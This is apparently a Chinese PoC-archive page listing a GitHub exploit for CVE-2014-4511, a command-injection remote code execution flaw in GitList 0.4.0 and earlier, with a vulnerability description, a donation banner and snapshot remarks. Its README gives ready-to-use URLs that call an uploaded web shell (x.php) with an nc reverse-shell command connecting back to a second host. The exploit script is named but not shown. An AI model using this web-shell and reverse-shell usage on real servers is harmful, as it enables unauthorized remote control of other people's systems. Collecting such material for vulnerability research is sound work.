Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2014-4511 PoC — GitList 远程代码执行漏洞

Source
https://github.com/michaelsss1/gitlist-RCE
Associated Vulnerability
Title:GitList 远程代码执行漏洞 (CVE-2014-4511)
Description:GitList是一款基于PHP的开源Git仓库查看器,它能够实现匿名在线浏览版本控制系统源码仓库中的内容,并支持查看不同版本中的文件,提交历史和差异。 Gitlist 0.4.0及之前的版本中存在安全漏洞。远程攻击者可通过向blame、file、stats页面发送请求URI的文件名参数中的shell元字符利用该漏洞执行任意命令。
Description
CVE-2014-4511
Readme
# gitlist-RCE
CVE-2014-4511
example:
after shell upload successfully:
access:
http://192.168.1.126/cache/x.php/?cmd=nc -nv 192.168.1.127 1111 -e /bin/sh
http://192.168.1.126/cache/x.php/?cmd=nc%20-nv%20192.168.1.127%201111%20-e%20/bin/sh
File Snapshot

 [4.0K]  /data/pocs/aafeb171682f85ab5cde076b8c47423ab41019ed
├── [ 817]  gitlistRCE
└── [ 238]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.